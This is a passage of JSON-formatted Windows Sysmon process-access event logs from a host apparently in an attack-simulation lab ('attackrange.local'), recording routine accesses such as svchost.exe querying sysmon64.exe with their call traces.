30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+ffffcd80(wow64)|UNKNOWN(00007FFD66A8824C)|UNKNOWN(00007FFD66A64025)|UNKNOWN(00007FFD66A63CF6)|UNKNOWN(00007FFD6751510B)|UNKNOWN(00007FFD66A2488C)|UNKNOWN(00007FFD66A82D5B)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A66251)","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5678,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.862\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-001074C30600}\r\nTargetProcessId: 5076\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.862","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-001074C30600}","TargetProcessId":"5076","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5679,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.862\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.862","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5680,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.878\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.878","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5681,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.878\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.878","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5682,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.878\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.878","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5683,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.878\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.878","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5684,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.878\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.878","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5685,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.878\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.878","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5686,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.878\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 